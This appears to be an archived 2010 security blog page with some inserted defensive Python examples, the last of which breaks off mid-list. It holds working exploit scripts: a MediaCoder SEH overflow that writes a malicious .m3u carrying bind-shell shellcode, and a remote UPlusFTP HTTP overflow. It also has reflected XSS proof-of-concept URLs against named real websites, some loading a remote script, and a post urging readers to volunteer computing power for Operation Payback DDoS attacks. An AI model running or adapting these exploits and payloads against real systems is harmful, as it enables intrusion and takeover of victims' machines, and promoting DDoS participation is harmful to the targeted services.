Wednesday, December 8, 2010

MediaCoder v0.7.5.4796 Local Buffer Overflow [ SEH ]

Recently I came across EDB http://www.exploit-db.com/exploits/15630 - MediaCoder v0.7.5.4792 SEH overflow exploit.


So, decided to verify the current release 0.7.5.4796 as well. There is a buffer overflow in this version which can allow an attacker to gain complete control of the system running this application.




Here is the exploit I wrote, for educational purposes only of course. :-)


#!/usr/bin/python


import sys


# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]
# Download: http://www.mediacoderhq.com/getfile.htm?site=download.mediacoderhq.com&file=MediaCoder-0.7.5.4796.exe


print "\n"
print "#"
print "********************************************************************* *"
print "#                                                                                                   #"
print "*  MediaCoder version <=v0.7.5.4796 SEH Buffer Overflow     *"
print "*  Author : Karn Ganeshen                                                           *"
print "*  Date : December 05, 2010                                                        *"
print "*  KarnGaneshen [aT] gmail [d0t] c0m                                        *"
print "*  http://ipositivesecurity.blogspot.com                                        *"
print "#                                                                                                  #"
print "**********************************************************************"
print "#\n"


if len(sys.argv) > 1:
    print "Usage: ./mcoder.py\n"
    sys.exit(1)


junk = "\x41" * 764
nseh = "\xEB\x06\x90\x90" #  Short jump
seh = "\x87\x71\x01\x66" #  0x66017187 / C:\Program Files\MediaCoder\libiconv-2.dll
nops = "\x90" * 24


# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
shellcode = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x43"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x53\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x62"
"\x4a\x48\x6b\x70\x4d\x38\x68\x6c\x39\x4b\x4f\x79\x6f\x6b\x4f\x73"
"\x50\x4c\x4b\x72\x4c\x46\x44\x57\x54\x4e\x6b\x31\x55\x67\x4c\x4e"
"\x6b\x63\x4c\x34\x45\x62\x58\x46\x61\x48\x6f\x4e\x6b\x50\x4f\x44"
"\x58\x6c\x4b\x51\x4f\x45\x70\x44\x41\x6a\x4b\x70\x49\x6e\x6b\x35"
"\x64\x4c\x4b\x53\x31\x78\x6e\x75\x61\x6b\x70\x4f\x69\x6e\x4c\x4b"
"\x34\x4f\x30\x53\x44\x57\x77\x6f\x31\x4b\x7a\x74\x4d\x75\x51\x69"
"\x52\x68\x6b\x48\x74\x57\x4b\x70\x54\x64\x64\x47\x58\x50\x75\x6d"
"\x35\x4c\x4b\x31\x4f\x36\x44\x56\x61\x78\x6b\x63\x56\x6c\x4b\x54"
"\x4c\x70\x4b\x4e\x6b\x53\x6f\x75\x4c\x47\x71\x5a\x4b\x63\x33\x54"
"\x6c\x4e\x6b\x6b\x39\x30\x6c\x44\x64\x35\x4c\x71\x71\x5a\x63\x34"
"\x71\x6b\x6b\x72\x44\x6c\x4b\x37\x33\x76\x50\x4e\x6b\x71\x50\x56"
"\x6c\x6c\x4b\x44\x30\x65\x4c\x4c\x6d\x4c\x4b\x77\x30\x35\x58\x61"
"\x4e\x62\x48\x6c\x4e\x62\x6e\x44\x4e\x38\x6c\x50\x50\x4b\x4f\x5a"
"\x76\x45\x36\x70\x53\x41\x76\x32\x48\x70\x33\x56\x52\x45\x38\x42"
"\x57\x72\x53\x34\x72\x63\x6f\x72\x74\x6b\x4f\x78\x50\x72\x48\x38"
"\x4b\x58\x6d\x6b\x4c\x65\x6b\x42\x70\x49\x6f\x69\x46\x71\x4f\x6c"
"\x49\x6a\x45\x65\x36\x4f\x71\x4a\x4d\x35\x58\x53\x32\x50\x55\x32"
"\x4a\x35\x52\x49\x6f\x48\x50\x31\x78\x7a\x79\x36\x69\x4c\x35\x6c"
"\x6d\x70\x57\x39\x6f\x6e\x36\x70\x53\x32\x73\x62\x73\x56\x33\x52"
"\x73\x73\x73\x52\x73\x33\x73\x30\x53\x6b\x4f\x4a\x70\x35\x36\x75"
"\x38\x52\x31\x41\x4c\x61\x76\x50\x53\x4d\x59\x4d\x31\x4d\x45\x55"
"\x38\x69\x34\x56\x7a\x42\x50\x5a\x67\x36\x37\x79\x6f\x7a\x76\x61"
"\x7a\x76\x70\x66\x31\x73\x65\x39\x6f\x68\x50\x41\x78\x4d\x74\x4e"
"\x4d\x76\x4e\x68\x69\x42\x77\x79\x6f\x59\x46\x36\x33\x66\x35\x69"
"\x6f\x6e\x30\x45\x38\x4b\x55\x51\x59\x6f\x76\x72\x69\x42\x77\x6b"
"\x4f\x4a\x76\x70\x50\x46\x34\x36\x34\x53\x65\x79\x6f\x6e\x30\x6c"
"\x53\x65\x38\x4b\x57\x70\x79\x5a\x66\x52\x59\x30\x57\x69\x6f\x6a"
"\x76\x30\x55\x59\x6f\x6e\x30\x70\x66\x70\x6a\x53\x54\x72\x46\x62"
"\x48\x65\x33\x50\x6d\x6c\x49\x4d\x35\x31\x7a\x52\x70\x70\x59\x44"
"\x69\x7a\x6c\x4c\x49\x69\x77\x51\x7a\x71\x54\x4f\x79\x4b\x52\x34"
"\x71\x39\x50\x4c\x33\x4d\x7a\x6b\x4e\x71\x52\x44\x6d\x6b\x4e\x37"
"\x32\x54\x6c\x4e\x73\x4e\x6d\x33\x4a\x56\x58\x6c\x6b\x6c\x6b\x6e"
"\x4b\x53\x58\x64\x32\x69\x6e\x6c\x73\x44\x56\x6b\x4f\x73\x45\x47"
"\x34\x4b\x4f\x79\x46\x33\x6b\x42\x77\x73\x62\x30\x51\x73\x61\x72"
"\x71\x62\x4a\x33\x31\x42\x71\x50\x51\x72\x75\x50\x51\x49\x6f\x78"
"\x50\x71\x78\x4e\x4d\x39\x49\x75\x55\x6a\x6e\x70\x53\x4b\x4f\x59"
"\x46\x32\x4a\x4b\x4f\x49\x6f\x56\x57\x69\x6f\x5a\x70\x4e\x6b\x33"
"\x67\x49\x6c\x6d\x53\x39\x54\x55\x34\x39\x6f\x4b\x66\x31\x42\x69"
"\x6f\x4a\x70\x62\x48\x78\x70\x4d\x5a\x35\x54\x63\x6f\x70\x53\x39"
"\x6f\x4e\x36\x39\x6f\x38\x50\x43")


more = "\x90" * 10


exploit = junk + nseh + seh + nops + shellcode + more


try:
    f = open("evil.m3u",'w')
    f.write(exploit)
    f.close()
    print "[+] Generating exploit file..."
    print "[+] +++Evil m3u created+++ ^_^\n"
except:
    print "[!] +++Error occurred+++ \n"

Update: It's on packetstorm now [ http://packetstormsecurity.org/files/view/99350/mcoder-localBufferOverflow.py.txt ]


Best Regards.
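The handler address in the PoC above comes from libiconv-2.dll, a DLL shipped with the application, and it only works because the loader accepts any address inside that module as an exception handler. The added Python 3 example below (not code from the post or from MediaCoder) is the check a defender runs over a product's DLLs to find modules linked without SafeSEH, which is what makes such an address usable; it also reads the DEP and ASLR opt-in flags from the same header. The two PE32 images it builds are constructed test data; for a real DLL it reports whatever that file's headers say, and nothing here asserts the state of libiconv-2.dll itself.

```python
"""Added example, not part of the original post: report whether a 32-bit PE
module was linked with SafeSEH, i.e. whether the loader will accept any address
inside it as an exception handler. The PoC above takes its handler address from
a DLL bundled with the application; this check is how a defender finds such
modules in a product. Only the PE32 header fields the check needs are parsed."""
import struct
import sys

LOAD_CONFIG_DIR = 10            # IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
DLLCHAR_DYNAMIC_BASE = 0x0040   # ASLR opt-in
DLLCHAR_NX_COMPAT = 0x0100      # DEP opt-in
DLLCHAR_NO_SEH = 0x0400         # image declares it never uses SEH handlers
SEH_TABLE_OFFSET = 64           # SEHandlerTable in IMAGE_LOAD_CONFIG_DIRECTORY32 (count at 68)


def _rva_to_offset(rva, sections, size_of_headers):
    """Map an RVA to a file offset through the section table."""
    if rva < size_of_headers:
        return rva
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError("RVA 0x%x is not backed by any section" % rva)


def inspect_pe32(data):
    """Return the SafeSEH / DEP / ASLR state of a PE32 image given its bytes."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                                  # optional header follows the 20-byte COFF header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    size_of_headers = struct.unpack_from("<I", data, opt + 60)[0]
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    n_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    sections = []
    for i in range(n_sections):                      # 40-byte section headers after the optional header
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, opt + opt_size + 40 * i + 8)
        sections.append((va, vsize, raw_ptr, raw_size))
    report = {"aslr": bool(dll_chars & DLLCHAR_DYNAMIC_BASE), "nx_compat": bool(dll_chars & DLLCHAR_NX_COMPAT),
              "no_seh": bool(dll_chars & DLLCHAR_NO_SEH), "load_config": False,
              "sehandler_table": 0, "sehandler_count": 0}
    if n_dirs > LOAD_CONFIG_DIR:
        lc_rva, lc_size = struct.unpack_from("<II", data, opt + 96 + 8 * LOAD_CONFIG_DIR)
        if lc_rva and lc_size:
            lc = _rva_to_offset(lc_rva, sections, size_of_headers)
            report["load_config"] = True
            # The loader trusts the struct's own Size field; pre-SafeSEH structs end before offset 64.
            if struct.unpack_from("<I", data, lc)[0] >= SEH_TABLE_OFFSET + 8:
                report["sehandler_table"], report["sehandler_count"] = struct.unpack_from(
                    "<II", data, lc + SEH_TABLE_OFFSET)
    # Protected when the image declares a handler table (even an empty one) or declares it
    # never uses SEH. Otherwise any address in it may be used as a handler, which is what a
    # "pop pop ret" address taken from a bundled DLL relies on.
    report["safeseh"] = report["no_seh"] or report["sehandler_table"] != 0
    return report


def build_synthetic_dll(seh_table_va, seh_count, dll_chars=0, with_load_config=True):
    """Constructed test data, not a real DLL: a minimal PE32 image with one .rdata
    section that holds a 72-byte IMAGE_LOAD_CONFIG_DIRECTORY32."""
    sec_va, sec_raw, image_base = 0x1000, 0x200, 0x10000000
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)                 # e_lfanew at 0x3C -> PE header at 64
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x2102)  # i386, 1 section, 224-byte opt hdr, DLL
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 14, 0,
                      0x200, 0x200, 0, sec_va, sec_va, sec_va, image_base, 0x1000, 0x200,
                      5, 1, 0, 0, 5, 1,
                      0, 0x2000, 0x200, 0,
                      2, dll_chars,                                  # Subsystem, DllCharacteristics
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    if with_load_config:
        dirs[LOAD_CONFIG_DIR] = (sec_va, 72)
    opt += b"".join(struct.pack("<II", va, size) for va, size in dirs)
    sect = struct.pack("<8sIIIIIIHHI", b".rdata", 72, sec_va, 0x200, sec_raw, 0, 0, 0, 0, 0x40000040)
    headers = (dos + b"PE\0\0" + coff + opt + sect).ljust(sec_raw, b"\0")
    load_config = struct.pack("<IIHH", 72, 0, 0, 0) + b"\0" * 52 + struct.pack("<II", seh_table_va, seh_count)
    return headers + load_config.ljust(0x200, b"\0")


def main(paths):
    images = []
    for p in paths:
        with open(p, "rb") as fh:
            images.append((p, fh.read()))
    if not images:   # no files given: report on the two synthetic images instead
        images = [("synthetic-safeseh.dll", build_synthetic_dll(0x10001100, 3, DLLCHAR_NX_COMPAT)),
                  ("synthetic-unprotected.dll", build_synthetic_dll(0, 0, with_load_config=False))]
    for name, data in images:
        r = inspect_pe32(data)
        print("%-28s SafeSEH=%-5s DEP=%-5s ASLR=%-5s handlers=%d" % (
            name, r["safeseh"], r["nx_compat"], r["aslr"], r["sehandler_count"]))


if __name__ == "__main__":
    main(sys.argv[1:])
```

Run it with DLL paths as arguments to check real files; with none it reports on the two synthetic images. SEHOP (Windows Vista SP1 and later) is the OS-side mitigation for the same technique and is independent of how a module was linked; on XP, which the PoC targets, per-module SafeSEH is the only SEH-specific defence, so one unprotected DLL in the install directory is enough.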

Pro Wikileaks Hacker Groups take action

Okay folks. This is probably the most visible conflict being fought in the cyber world right now.

Several days of DDoS going back and forth..


Operation Payback is a pro-wikileaks response. It successfully took down MasterCard for around 11 hours.

And now Visa.com has been taken down.

If you have available resources [ read: computing power ] and would like to volunteer for Wikileaks support, check here:

http://pastehtml.com/view/1c8i33u.html

You can access Wikileaks here: http://213.251.145.96/ .

Saturday, September 11, 2010

ESPN Cricinfo Cross Site Scripting (XSS)

+++About ESPN Cricinfo+++
http://www.cricinfo.com/

+++Affected URL(s)+++
All URLs using vulnerable parameters

+++Vulnerable Parameters / Functions+++
genre
object
template
country
author
site_area
... and perhaps more!

+++PoC+++
http://www.cricinfo.com/talk/content/current/multimedia/feature.html?genre=21'"/><script>alert("XSS from genre")</script>
http://www.cricinfo.com/australia/content/quote/index.html?object=2'"/><script>alert("XSS from object")</script>
http://www.cricinfo.com/australia/content/team/2.html?template=fixtures'"/><script>alert("XSS from template")</script>
http://www.cricinfo.com/australia/content/player/country.html?country=2'"/><script>alert("XSS from country")</script>
http://www.cricinfo.com/magazine/content/story/magazine/author.html?genre=366'"/><script>alert("XSS from genre")</script>
http://www.cricinfo.com/magazine/content/story/magazine/author.html?author=29'"/><script/XSS/src=http://ha.ckers.org/xss.js>
http://www.cricinfo.com/magazine/content/current/story/magazine/alltime.html?site_area=5'"/><script/XSS/src=http://ha.ckers.org/xss.js>


ESPN Global 1st Notified: January 2010
ESPN Global 2nd Notification: September 06, 2010
Response Received: None
Current Status: Vulnerable (As of today, September 12, 2010)

Note: More URLs / parameters may be vulnerable.

Best Regards.

ESPN Global Cross Site Scripting (XSS)


+++About ESPN Global+++
http://espn.go.com

+++Affected URL(s)+++
http://boards.espn.go.com

+++Vulnerable Parameter / Function+++
sport
id
nav

+++PoC+++
http://boards.espn.go.com/boards/mb/mb?sport=espn'><script>alert('XSS from sport')</script>&id=index'><script>alert('XSS from id')</script>

ESPN Global 1st Notified: January 2010
ESPN Global 2nd Notification: September 06, 2010
Response Received: None
Current Status: Vulnerable (As of today, September 12, 2010)

Best Regards.

Wednesday, July 28, 2010

UPlus FTP Server v1.7.1.0.1 remote buffer overflow exploit published

Hi All,

Posted another remote code execution exploit on Exploit-db an hour back. It is published now :-)

###
#!/usr/bin/python
import socket,sys,base64
print """
#
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    UPlusFTP Server v1.7.1.01 [ HTTP ] Remote BoF Exploit PoC
    Discovered by : Karn Ganeshen                         
    Author : Karn Ganeshen / corelanc0d3r
                                                    
    KarnGaneshen [aT] gmail [d0t] com                         
    http://ipositivesecurity.blogspot.com
                                                
    Greetz out to:  corelanc0d3r
                    http://corelan.be:8800/index.php
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
"""
# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]
# Date Found : July 21, 2010
# Vendor notified on July 23, 2010
# Issue fixed and new version 1.7.1.02 released on July 23, 2010
if len(sys.argv) != 5:
    print "Usage: ./poc.py <Target IP> <Port> <User> <Password>"
    sys.exit(1)
  
target = sys.argv[1]
port = int(sys.argv[2])
user = sys.argv[3]
pwd = sys.argv[4]
auth = base64.b64encode(user+":"+pwd)
buf="A"*1963
buf+="\x90"*179
# 165 bytes Calc.exe shellcode / badchars identified and excluded
buf+=("\xd9\xca\x29\xc9\xb1\x24\xbf\x3f\xc7\x66\x9f\xd9\x74\x24\xf4\x5e"
"\x31\x7e\x17\x03\x7e\x17\x83\xf9\xc3\x84\x6a\xf9\x24\x0c\x95\x01"
"\xb5\x06\xd0\x3d\x3e\x64\xde\x45\x41\x7a\x6b\xfa\x59\x0f\x33\x24"
"\x5b\xe4\x85\xaf\x6f\x71\x14\x41\xbe\x45\x8e\x31\x45\x85\xc5\x4e"
"\x87\xcc\x2b\x51\xc5\x3a\xc7\x6a\x9d\x98\x2c\xf9\xf8\x6a\x73\x25"
"\x02\x86\xea\xae\x08\x13\x78\xef\x0c\xa2\x95\x84\x31\x2f\x68\x71"
"\xc0\x73\x4f\x81\x10\xba\x4f\xed\x1d\xfd\x7f\x68\xe1\x86\x73\xf9"
"\xa2\x7a\x07\x8d\x3e\x2e\x9c\x05\x37\xdb\xaa\x5e\xc7\xab\xad\x60"
"\xc8\x40\xc5\x5c\x97\x67\xe0\xfc\x71\x01\xf4\x7f\xbd\x6a\x55\x17"
"\xce\x07\x51\xb8\x46\x80\xa4\xcc\x99\xe7\xa7\x37\xc6\x66\x34\xd4"
"\x27\x0c\xbc\x7f\x38")
buf+="\x90"*15
#[ XP SP2 ] -> "\x78\x16\xF3\x77"    #0x77F31678  JMP ESP
buf+="\x78\x16\xF3\x77"
#[ XP SP3 ] -> "\x3F\x71\x49\x7E"   #0x7E49713F  JMP ESP
#buf+="\x3F\x71\x49\x7E"
buf+="\x90"*30
buf+="\x66\x05\x7A\x03"         #ADD AX,037A
buf+="\x66\x05\x7A\x03"         #ADD AX,037A
buf+="\x66\x05\x7A\x03"         #ADD AX,037A
buf+="\x50\xc3"                 #PUSH EAX + RET
print "[+] Launching exploit against " + target + "..."
head = "GET /list.html?path="+buf+" HTTP/1.1 \r\n"
head += "Host: \r\n"
head += "Authorization: Basic "+auth+"\r\n"
  
try:
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((target, port))
    s.send(head + "\r\n")
    print "[!] Payload sent..."
    s.close()
except:
    print "[x] Error!"

I actually missed out on specifying the bad chars which I excluded while generating the payload. So here they are:
\x0a \x20 \x25 \x26
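The request above is an authenticated GET whose `path` query value is over 2 KB and mostly non-printable, which is nothing like the file path the parameter is meant to carry. The added Python 3 example below (not code from the post or from the UPlus project) is the triage a reverse proxy, WAF rule or log parser in front of such a server can do: flag query values by length, by byte class and by NOP-sled runs, and attribute the request to the Basic-auth username without ever keeping the password. The length threshold, the hostnames and both sample requests are constructed; the hostile sample keeps only the layout of the PoC (filler, NOP runs) with placeholders where the shellcode and return address would be.

```python
"""Added example, not part of the original post: server-side triage of the request
shape used by the PoC above. The exploit reaches the bug through an authenticated
HTTP GET whose `path` query value is ~2.2 KB and mostly non-printable, so a reverse
proxy, WAF rule or log parser can flag it on length, byte class and NOP-sled runs and
attribute it to the Basic-auth user without ever keeping the password. Thresholds,
hostnames and both sample requests are constructed."""
import base64
from urllib.parse import unquote_to_bytes

MAX_VALUE_LEN = 512             # assumed: no legitimate client sends a longer query value here
SLED_BYTE, SLED_RUN = 0x90, 16  # a run of 16+ x86 NOPs is a sled, not a file name


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, [(name, value)], headers).
    Works on bytes so non-UTF-8 payload bytes survive instead of raising."""
    head = raw.partition(b"\r\n\r\n")[0]
    lines = head.split(b"\r\n")
    method, target, _version = (lines[0].split(b" ", 2) + [b"", b""])[:3]
    path, _, query = target.partition(b"?")
    params = []
    for pair in (query.split(b"&") if query else []):
        name, _, value = pair.partition(b"=")
        params.append((name, unquote_to_bytes(value)))
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return method, path, params, headers


def longest_run(data, byte):
    """Length of the longest run of `byte` in `data`."""
    best = run = 0
    for b in data:
        run = run + 1 if b == byte else 0
        best = max(best, run)
    return best


def basic_auth_user(headers):
    """Username from a Basic Authorization header, or None. The password is never returned."""
    auth = headers.get(b"authorization", b"")
    if not auth.lower().startswith(b"basic "):
        return None
    try:
        creds = base64.b64decode(auth[6:], validate=True)
    except ValueError:            # binascii.Error is a ValueError subclass
        return None
    return creds.split(b":", 1)[0].decode("latin-1")


def triage(raw):
    """Return the request path, the authenticated user and (parameter, [reasons]) for
    every query value that looks like an overflow attempt rather than a file path."""
    _method, path, params, headers = parse_request(raw)
    findings = []
    for name, value in params:
        reasons = []
        if len(value) > MAX_VALUE_LEN:
            reasons.append("length %d > %d" % (len(value), MAX_VALUE_LEN))
        non_printable = sum(1 for b in value if b < 0x20 or b > 0x7E)
        if non_printable:
            reasons.append("%d non-printable bytes" % non_printable)
        sled = longest_run(value, SLED_BYTE)
        if sled >= SLED_RUN:
            reasons.append("run of %d x 0x90 (NOP sled)" % sled)
        if reasons:
            findings.append((name.decode("latin-1"), reasons))
    return {"path": path.decode("latin-1"), "user": basic_auth_user(headers), "findings": findings}


def constructed_samples():
    """Two constructed requests: a benign listing, and one with the PoC's layout
    (filler, NOP runs) with placeholders where the shellcode and return address
    would sit. This is NOT the exploit payload."""
    auth = b"Authorization: Basic " + base64.b64encode(b"demo:demo") + b"\r\n"
    benign = b"GET /list.html?path=/pub/music HTTP/1.1\r\nHost: ftp.example.com\r\n" + auth + b"\r\n"
    filler = b"A" * 1963 + b"\x90" * 179 + b"[shellcode-placeholder]" + b"\x90" * 15 + b"[ret-placeholder]"
    hostile = b"GET /list.html?path=" + filler + b" HTTP/1.1 \r\nHost: \r\n" + auth + b"\r\n"
    return benign, hostile


if __name__ == "__main__":
    for request in constructed_samples():
        print(triage(request))
```

Because the bug sits behind HTTP Basic authentication, the username is the most useful field for attribution, and the check keeps only that. The vendor fix (1.7.1.02, noted in the PoC header) is the real remedy; this kind of triage is what protects the servers that have not been updated and tells you who tried.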

I should be able to post a video showing how this exploit was prepared & tested. Watch out on this space!

Shoutz to corelanc0d3r! :)

You may also check it out here:

Update: Advisory published on Secunia -> http://secunia.com/advisories/40771

Best Regards.

Monday, July 19, 2010

2 Remote Buffer Overflow Code Execution Exploits Published

Hey folks,

As of late, I am reading up on buffer overflows. This is one topic I had been escaping for quite a time. All those hexes \x* , CPU registers [ eip, esp, ecx, ebx, eax ], exploit jargon like sled, nops, jmp et al. just didn't make any sense. Until a few weeks back when I decided to take it head on / [ me beats his chest and roars! ] :D

<-----Rewind----->Back a few weeks from now

I wanted to start up with something new. Had an idea and started researching on it. It is an interesting subject but there's not much of a 'fresh' learning. So, I put it on a pause for a while and decided to start with BoF. Nevertheless, it's going to be useful to many who are freshers or currently in the Information Security domain, of course when I complete it. ;)

After going over half-a-dozen quality articles, ability server & sl mail tutorial by guys over at offsec, I began testing on an open-source ftp server - Easy FTP server v1.7.0.11.

For a perfect noobie in BoF, easyftp server was not easy.. :)
Anyways, in around half a day, I could confirm 2 vuln commands in this application. Working on and off along with work at office, I wrote stable Remote Buffer Overflow command execution exploits for each of these. :)

<-----quick snip----->
For those who are new at fuzzing and finding buffer overflows, and are looking for a formal book, here is one that I'd recommend ya:

This is a nice book that would take you through basics of fuzzing, gradually introducing you to several fuzzing frameworks available today.

A good read for anyone wanting to learn fuzzing.

Fuzzing... is the first and only book to cover fuzzing from start to finish, bringing disciplined best practices to a technique that has traditionally been implemented informally. The authors begin by reviewing how fuzzing works and outlining its crucial advantages over other security testing methods. Next, they introduce state-of-the-art fuzzing techniques for finding vulnerabilities in network protocols, file formats, and web applications; demonstrate the use of automated fuzzing tools; and present several insightful case histories showing fuzzing at work.

<-----recent----->
I submitted my exploits over to Exploit-db yesterday [ http://www.exploit-db.com/remote/ ] and later in the day, saw they were confirmed as well. :)

<-----today----->
I feel great at this. Though it's simple, now that I know it, the experience which came out of past few weeks is real learning and very interesting.

You may choose to read my exploits here:



Best Regards.

Sunday, June 20, 2010

An interesting truth about what motivates us!

What Motivates us!
Came across this YouTube video by guys over at RSAnimate. An awesome animation / presentation on the motivating parameters for an individual and how they differ from the expected norms. A good watch...



Best Regards.

To CISSP Aspirants!

Hi folks,

In June 2009, I cleared the ISC2 CISSP exam and posted my CISSP study plan. Since then, I have continuously been receiving comments and requests, both on my blog post and offline at my email, to share the resources which I used for my preparation.

Although I have shared the appropriate websites and forum details in my CISSP Study Plan post above, getting study material together still appears challenging to many candidates. Therefore, I've decided to actively support all you CISSP aspirants through directing you to available study resources.

I request everyone to please not ask me for any exam dumps for CISSP study, because there aren't any. What I am going to try and help you with is the study material which you will need in your CISSP preparation.

Please put your request or any concern on my CISSP Study Plan post here http://ipositivesecurity.blogspot.com/2009/06/cissp-my-study-plan.html and I shall try and share the appropriate pointers in this post.

Wish you all the best in your pursuit of the CISSP.

Best Regards.

Mercedes Benz Cross Site Scripting (XSS)

+++About Mercedes Benz+++
http://en.wikipedia.org/wiki/Mercedes-Benz


+++Affected URL(s)+++
http://www.mercedes-benz.com/


+++Vulnerable Parameter / Function+++
'dsc_wdw'


+++PoC+++
Home Page -> Request Brochure
vuln parameter -> @dsc_wdw


+POST Request+
https://e-services.mercedes-benz.com/Dialog_RQB/RQB;jsessionid=0000fct1dbQH_OtagtCR9h9ZhZj:14k117133?subprocess=RQBc_Cars&locale=en_IN&site_locale=en_IN


+Parameters+
dsc_lnk=sn_step2&dsc_pg=p1302&dsc_wdw='<script>alert("Mercedes.Benz Vuln to XSS")</script>&dsc_lnkapx=&historyBack=true&lastPage=p1302a&p1302.mtxCar%5B0%5D%5B0%5D=car002




Mercedes Benz 1st Notified: January 22, 2010
Mercedes Benz 2nd Notification: June 15, 2010
Response Received: None
Current Status: Vulnerable (As of today, June 20, 2010)


Best Regards.

MTV vulnerable to Cross Site Scripting (XSS)

+++About MTV+++
http://en.wikipedia.org/wiki/MTV


+++Affected URL(s)+++
http://www.mtv.com
http://think.mtv.com


+++Vulnerable Parameter / Function+++
'q'
'search_term'


+++PoC+++
MTV - http://www.mtv.com
http://www.mtv.com/search/?q=<script>alert('xss from search')</script>


Think.MTV - http://think.mtv.com

http://think.mtv.com/Search/TagResults.aspx?search_term=<script>alert('xss from search_term')</script>&filter_by=7&sort_order_type=1&category_ucid=44FDFFFF0002D79CFFFF00000069&time_stamp=

MTV 1st Notified: January 06, 2010
MTV 2nd Notification: June 15, 2010
Response Received: None
Current Status: Vulnerable (As of today, June 20, 2010)


Best Regards.

Sunday, June 13, 2010

Cognizant vulnerable to Cross-Site Scripting (XSS)

+++About Cognizant+++
We help transform core processes for greater flexibility, higher efficiency and lower costs. 
http://www.cognizant.com/html/aboutus/about-us.asp

+++Affected URL(s)+++
http://cognizant.com/html/insights/insightslandingpage.asp

-> Case Studies
-> White Papers

+++Vulnerable Parameter / Function+++
'hidPageID'

+++PoC+++

POST Request
-> Case studies
hidCommand=&hidSearchCriteria=&hidRequestedPageNumber=&hidPageID=<-script->alert("XSS from hidPageID")</script>&hidIncludeFileName=leftNav-insights.asp&hidContentType=casestudy&hidYear=&hidPageTitle=Case+Studies&hidNavigatingFrom=Insights&hidPageNumber=1

-> White Papers
POST http://cognizant.com/html/insights/insightslandingpage.asp
global_office=%2Fhtml%2Fhome.asp&hidCommand=&hidSearchCriteria=&hidRequestedPageNumber=&hidPageID=<-script->alert("XSS from hidPageID")</script>&hidIncludeFileName=leftNav-insights.asp&hidContentType=bluepaper&hidYear=&hidPageTitle=White+Papers&hidNavigatingFrom=Insights&selFilterCriteria=All+white+papers&hidPageNumber=3


Cognizant 1st Notified: February 23, 2010
Cognizant 2nd Notification: March 29, 2010
Response Received: March 30, 2010
Current Status: Fixed (As of today, June 13, 2010)

Thanks to Nikhilesh Jasuja @Cognizant for his quick response on resolving this issue.

Best Regards.
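All of the XSS proofs of concept on this page (Cricinfo, ESPN, Mercedes-Benz, MTV, Cognizant) share one shape: the injected value first closes the attribute or tag the parameter is echoed into and then opens a script tag. The added Python 3 example below (not code from the advisories or from any of the sites) shows that echo pattern next to its fix, HTML attribute encoding of the reflected value, and a detector that flags the same probe shape in access-log lines and form bodies. The template, hostnames and log lines are constructed.

```python
"""Added example, not part of the original advisories: the reflection pattern
behind the XSS reports above next to its fix, and a log-side detector for the
PoC style they share. Every PoC injects a value that first closes the attribute
or tag the parameter is echoed into ('"/> ...) and then opens <script>;
context-aware HTML encoding of the echoed value defeats that. The template,
hostnames and log lines below are constructed, not taken from the sites."""
import html
import re
from urllib.parse import parse_qsl, urlsplit


def render_unsafe(genre):
    """Assumed vulnerable fragment: the query parameter is echoed into an attribute."""
    return '<input type="hidden" name="genre" value="%s">' % genre


def render_safe(genre):
    """Same fragment with HTML attribute encoding; quote=True also encodes ' and "
    so the value can never terminate the attribute it sits in."""
    return '<input type="hidden" name="genre" value="%s">' % html.escape(genre, quote=True)


# Substrings that do not occur in legitimate ids, names or search terms.
MARKERS = ("<script", "</", "javascript:", "onerror=", "onload=", "onmouseover=")


def scan_query(query):
    """Names of parameters whose (percent-decoded) value carries markup or script.
    parse_qsl decodes %XX and + first, so %3Cscript%3E is caught as well."""
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        v = value.lower()
        if any(m in v for m in MARKERS) or ("<" in v and ">" in v):
            hits.append(name)
    return hits


def scan_url(url):
    """Same check for the query string of a full or path-only URL."""
    return scan_query(urlsplit(url).query)


def scan_form_body(body):
    """Same check for application/x-www-form-urlencoded POST bodies (the
    Mercedes-Benz and Cognizant PoCs above are POST requests)."""
    return scan_query(body)


# Constructed combined-log lines in the shape of a typical web server access log.
CONSTRUCTED_LOG = [
    '203.0.113.7 - - [11/Sep/2010:20:01:02 +0530] "GET /talk/feature.html?genre=21 HTTP/1.1" 200 5120',
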